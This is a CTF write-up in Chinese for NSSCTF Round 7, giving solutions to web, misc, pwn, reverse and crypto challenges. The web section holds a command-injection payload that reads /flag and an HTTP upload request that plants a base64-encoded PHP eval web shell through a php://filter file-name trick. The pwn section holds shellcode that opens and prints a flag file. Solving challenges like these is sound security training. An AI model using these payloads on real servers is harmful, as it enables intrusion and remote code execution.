NSSCTF Round7 WP

NSSCTF Round7 WP

还不错,一个全场唯一解一个二血,队友还拿了一个一血(KoH)两个二血

Web

F | ez_RCE | Doxxx

action=1'&data=;cat /flag %23'

2 | OoO | Doxxx

POST /Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTf=data://text/plain;base64,V2VsY29tZSB0byBSb3VuZDchISE=&NsScTF=1a&nss[ctfer.vip=1&NSScTf=0337522&nSScTF=1&nSscTF=NSSRound7 HTTP/1.1
Host: 43.143.7.127:28734
Content-Length: 580
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryarnwHDEBVmc9Vybv
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="NsScTf"

Welcome to Round7!!!
------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="file"; filename="%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%31%2e%70%6e%67%2e%70%68%70"
Content-Type: image/jpeg

aaaPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+
------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryarnwHDEBVmc9Vybv--

Misc

1 | brokenFilterChain | App1e_Tree

认真读文档就行,实际上我们需要解析这里的四十多行,每行代表一个字符

https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT 这里有相关字符对应的字符串,转换之后倒序(文档里也提到了)字符串解base64

NssssCTFeyAgphhpRmlsdGVyQ2hhMW5fW4sS0FunICB9GyQp

后面W4sS0Fun不用解base64,凑一凑flag就出来了,好像是下面这个,记不住了

NssssCTF{phhpFilterCha1n_W4sS0Fun}

一血,并且全场一解

2 | Ikun的电脑 | App1e_Tree

把有用的提出来

1.5那里有段音频,开头有噪声,放大看是0 1序列

单独放到一个声道,工具->采样数据导出,根据数据正负填写对应0 1,查一下发现是zip

passware爆破密码,得到1.12里面zip的密码

得到图片如下

查一下图片大小3500* 3500,一共35* 35张图片,分别代表0 1,提取一下两张100* 100大小的图片,这里用的ImageMagick Display

然后找两张图片不同像素点做对比,写个脚本就好了
exp:

from PIL import Image

right=Image.open('1.png')
left=Image.open('2.png')
r=right.getpixel((50,50))
l=left.getpixel((50,50))

img=Image.open('flag.png')
res=Image.new('RGB',(35,35))
for x in range(35):
    for y in range(35):
        orix=100*x-50
        oriy=100*y-50
        p=img.getpixel((orix,oriy))
        if p==r:
            res.putpixel((x,y),(255,255,255))
        else:
            res.putpixel((x,y),(0,0,0))
res.save('haha.png')

然后扫就行了

Pwn

1 | 奇你太美 | emmm

跳回去再读一次shellcode,strncpy有点坑,src为0的话会把0x10000的内容都清空,就改rbp做了,让他自己再把shellcode拷贝一次去执行
exp:

from pwn import *


context.arch = 'amd64'


shellcode = '''
mov edi,0x01033103
xor edi,0x01011101

shr edi,1
push rdi
pop rbp

add edi,-0x211

mov [edi],edi
mov eax,[edi]

pop rbx
mov bl,75
push rbx

ret
'''

write_txt = '''
/*open */
xor rax,rax

mov edi,edx
mov dil,36              /*/nss.txt*/

push 0x41
pop rsi

shr edx,8
mov dl, 0xff
mov al,0x2
syscall

/*write txt*/
mov esi,edi
mov sil,30
mov edi,eax

mov al,1
syscall
'''


payload = asm(shellcode)  + b'\x00'
print(len(asm(write_txt)))

payload2 = asm(write_txt) + b'nss666/nss.txt\x00'

#exit(0)


for i in range(len(payload)):
    # if payload[i] & 1 == 0:
    #     assert(False)
    print('%d',payload[i])

with open('shellcode','wb')as f:
    f.write(payload)
    f.write(payload2)

Re

2 | Tetris | emmm

直接用CE改内存就行

Crypto

F | 裁雨留虹 | App1e_Tree

q的低151位被noise数据干扰,p q高位满足相加二进制全1,p-q越小,相乘结果越大,初始让p全为1,q全为0,不断调整,得到q高512-151bit,然后coppersmith解低位
exp:

from Crypto.Util.number import *
import gmpy2
n=9917194039107056112184040918942991087006948095942990759083653963386347099537872574166056046291870369660144747910297948865119742599237172372299988293988091347394105128159638670279156137176691709760735170161276067729520093855522898374683007605621773716069049053067108582990968946937131419271617984877669716809
e=65537
c=7587789694070748707348883888501708440754567305328311759140303893816709636596826176623331039561461438614968853491941771170730448862622628116994823624292597456598154540152890431881836541630974352792727975698270205577342357896211852053562431611816629189278379946359321494584849773739040563488839129619217040844

p=((1<<512)-1)^^((1<<151)-1)
q=0
for i in range(510,150,-1):
        bit=1<<i
        if (p^^bit)*(q^^bit)<n:
                p^^=bit
                q^^=bit
 
P.<x>=PolynomialRing(Zmod(n))
for i in range(150,230):
    f=x+ZZ(((p>>i)<<i))
    root=f.small_roots(X=2^i,beta=0.4)
    if root!=[]:
        p=root[0]+ZZ(((p>>i)<<i))
        break
 
q=ZZ(n)//ZZ(p)
phi=ZZ((p-1)*(q-1))
d=gmpy2.invert(e,phi)
flag=ZZ(pow(c,d,n))
print(long_to_bytes(flag))
#NSSCTF{e75a2dbf-8581-49bf-a125-383cca7fd377}

织诗成锦

转到我的另一篇推文
https://www.cnblogs.com/App1eTree/#/c/subject/p/17077107.html

posted @ 2023-01-28 16:35  App1e_Tree  阅读(353)  评论(0编辑  收藏  举报